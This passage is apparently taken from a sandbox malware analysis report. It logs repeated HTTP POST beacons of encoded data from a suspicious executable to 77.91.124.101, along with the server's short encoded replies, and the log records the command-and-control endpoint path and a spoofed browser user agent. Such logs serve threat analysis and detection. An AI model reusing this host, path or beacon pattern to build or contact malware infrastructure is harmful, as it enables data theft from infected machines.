Nov 21, 2023 04:47:32.690422058 CET	183	OUT	Data Raw: 57 51 58 5f 5e 5e 5a 5b 5d 57 55 57 55 5a 57 51 50 59 58 40 56 51 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WQX_^^Z[]WUWUZWQPYX@VQW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(1<81*0+;7& )!?U='>P&3",8=+';&G''^)7
Nov 21, 2023 04:47:32.893771887 CET	184	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
100	77.91.124.101	80	192.168.2.5	49815	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:34.131325960 CET	559	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1396 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:34.329173088 CET	560	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:34.329386950 CET	561	OUT	Data Raw: 57 59 58 5e 5b 5d 5f 59 5d 57 55 57 55 5e 57 55 50 5e 58 40 56 55 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WYX^[]_Y]WUWU^WUP^X@VUWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*=X<!>34/$6]#)%_+U=&>:P309-%+ 8&G''^)?
Nov 21, 2023 04:48:34.532227993 CET	564	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:34 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 21 03 31 3f 33 05 23 33 33 1e 2b 14 26 0b 2d 00 26 09 28 0d 25 5b 26 04 28 13 26 29 3a 0d 3f 11 24 5b 30 3a 3f 09 34 08 30 5d 29 0a 21 5a 0c 1d 26 5e 21 2b 24 0b 2b 07 38 11 28 13 30 5e 32 32 20 00 3c 2d 33 18 23 1d 33 59 25 23 12 52 2c 06 32 03 39 16 0c 06 25 3c 0c 5b 20 2d 23 5f 0c 14 27 51 22 32 2f 1d 34 33 26 1f 23 37 38 5f 20 27 2b 57 27 3d 28 13 32 06 26 07 3f 38 2f 0e 26 37 3c 1c 27 04 20 0d 26 07 23 55 2b 00 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: !1?3#33+&-&(%[&(&):?$[0:?40])!Z&^!+$+8(0^22 <-3#3Y%#R,29%<[ -#_'Q"2/43&#78_ '+W'=(2&?8/&7<' &#U+&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
100	192.168.2.5	49815	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:34.131325960 CET	559	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1396 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:34.329173088 CET	560	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:34.329386950 CET	561	OUT	Data Raw: 57 59 58 5e 5b 5d 5f 59 5d 57 55 57 55 5e 57 55 50 5e 58 40 56 55 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WYX^[]_Y]WUWU^WUP^X@VUWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*=X<!>34/$6]#)%_+U=&>:P309-%+ 8&G''^)?
Nov 21, 2023 04:48:34.532227993 CET	564	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:34 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 21 03 31 3f 33 05 23 33 33 1e 2b 14 26 0b 2d 00 26 09 28 0d 25 5b 26 04 28 13 26 29 3a 0d 3f 11 24 5b 30 3a 3f 09 34 08 30 5d 29 0a 21 5a 0c 1d 26 5e 21 2b 24 0b 2b 07 38 11 28 13 30 5e 32 32 20 00 3c 2d 33 18 23 1d 33 59 25 23 12 52 2c 06 32 03 39 16 0c 06 25 3c 0c 5b 20 2d 23 5f 0c 14 27 51 22 32 2f 1d 34 33 26 1f 23 37 38 5f 20 27 2b 57 27 3d 28 13 32 06 26 07 3f 38 2f 0e 26 37 3c 1c 27 04 20 0d 26 07 23 55 2b 00 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: !1?3#33+&-&(%[&(&):?$[0:?40])!Z&^!+$+8(0^22 <-3#3Y%#R,29%<[ -#_'Q"2/43&#78_ '+W'=(2&?8/&7<' &#U+&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
101	192.168.2.5	49816	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:34.258927107 CET	560	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:34.459631920 CET	561	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:34.459961891 CET	564	OUT	Data Raw: 57 5e 5d 5d 5b 5b 5a 51 5d 57 55 57 55 57 57 53 50 5d 58 42 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W^]][[ZQ]WUWUWWSP]XBV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\)"=;*R?#/$2_4=X+ "$>!&0.><,8>&G''^)
Nov 21, 2023 04:48:34.664002895 CET	565	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
101	77.91.124.101	80	192.168.2.5	49816	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:34.258927107 CET	560	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:34.459631920 CET	561	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:34.459961891 CET	564	OUT	Data Raw: 57 5e 5d 5d 5b 5b 5a 51 5d 57 55 57 55 57 57 53 50 5d 58 42 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W^]][[ZQ]WUWUWWSP]XBV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\)"=;*R?#/$2_4=X+ "$>!&0.><,8>&G''^)
Nov 21, 2023 04:48:34.664002895 CET	565	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
102	192.168.2.5	49817	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:34.998446941 CET	566	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:35.196516037 CET	566	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:35.196736097 CET	569	OUT	Data Raw: 52 5a 58 51 5e 5f 5f 59 5d 57 55 57 55 57 57 52 50 58 58 49 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZXQ^__Y]WUWUWWRPXXIV_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'85<^/4%#:_)#*P'!$"U-(6^(-.&G''^)
Nov 21, 2023 04:48:35.399066925 CET	569	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
102	77.91.124.101	80	192.168.2.5	49817	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:34.998446941 CET	566	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:35.196516037 CET	566	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:35.196736097 CET	569	OUT	Data Raw: 52 5a 58 51 5e 5f 5f 59 5d 57 55 57 55 57 57 52 50 58 58 49 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZXQ^__Y]WUWUWWRPXXIV_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'85<^/4%#:_)#*P'!$"U-(6^(-.&G''^)
Nov 21, 2023 04:48:35.399066925 CET	569	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
103	192.168.2.5	49818	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:35.722460985 CET	570	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:35.920638084 CET	570	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:35.921303988 CET	572	OUT	Data Raw: 57 5d 58 51 5b 58 5a 5b 5d 57 55 57 55 5e 57 5a 50 5c 58 44 56 57 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W]XQ[XZ[]WUWU^WZP\XDVWW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^)Y=(1)88#<>3==0-8*\?</&G''^)
Nov 21, 2023 04:48:36.124488115 CET	573	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
103	77.91.124.101	80	192.168.2.5	49818	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:35.722460985 CET	570	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:35.920638084 CET	570	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:35.921303988 CET	572	OUT	Data Raw: 57 5d 58 51 5b 58 5a 5b 5d 57 55 57 55 5e 57 5a 50 5c 58 44 56 57 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W]XQ[XZ[]WUWU^WZP\XDVWW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^)Y=(1)88#<>3==0-8*\?</&G''^)
Nov 21, 2023 04:48:36.124488115 CET	573	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
104	77.91.124.101	80	192.168.2.5	49819	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:36.454344034 CET	573	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:36.651806116 CET	574	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:36.652051926 CET	576	OUT	Data Raw: 52 5f 58 5c 5b 53 5a 50 5d 57 55 57 55 5e 57 55 50 5b 58 42 56 5e 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_X\[SZP]WUWU^WUP[XBV^W\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*;)Y<89?##;&#\&<&R'>1'>-;><,,.&G''^)?
Nov 21, 2023 04:48:36.858058929 CET	577	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
104	192.168.2.5	49819	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:36.454344034 CET	573	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:36.651806116 CET	574	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:36.652051926 CET	576	OUT	Data Raw: 52 5f 58 5c 5b 53 5a 50 5d 57 55 57 55 5e 57 55 50 5b 58 42 56 5e 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_X\[SZP]WUWU^WUP[XBV^W\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*;)Y<89?##;&#\&<&R'>1'>-;><,,.&G''^)?
Nov 21, 2023 04:48:36.858058929 CET	577	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
105	77.91.124.101	80	192.168.2.5	49820	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:37.176589012 CET	578	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:37.373348951 CET	578	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:37.373555899 CET	580	OUT	Data Raw: 57 59 5d 5a 5b 59 5a 5f 5d 57 55 57 55 5a 57 56 50 5d 58 45 56 54 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WY]Z[YZ_]WUWUZWVP]XEVTWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$==X<.R=07/7.79:?U!3=9$0%98>^?88>&G''^)7
Nov 21, 2023 04:48:37.576966047 CET	581	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
105	192.168.2.5	49820	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:37.176589012 CET	578	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:37.373348951 CET	578	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:37.373555899 CET	580	OUT	Data Raw: 57 59 5d 5a 5b 59 5a 5f 5d 57 55 57 55 5a 57 56 50 5d 58 45 56 54 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WY]Z[YZ_]WUWUZWVP]XEVTWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$==X<.R=07/7.79:?U!3=9$0%98>^?88>&G''^)7
Nov 21, 2023 04:48:37.576966047 CET	581	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
106	77.91.124.101	80	192.168.2.5	49821	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:37.894817114 CET	581	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:38.093694925 CET	582	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:38.093915939 CET	584	OUT	Data Raw: 52 5f 5d 5d 5b 5f 5f 5a 5d 57 55 57 55 5b 57 52 50 52 58 40 56 54 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_]][__Z]WUWU[WRPRX@VTW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>82(9?0'[8$&\7*]) %'W&0:R,;><,;^/&G''^)3
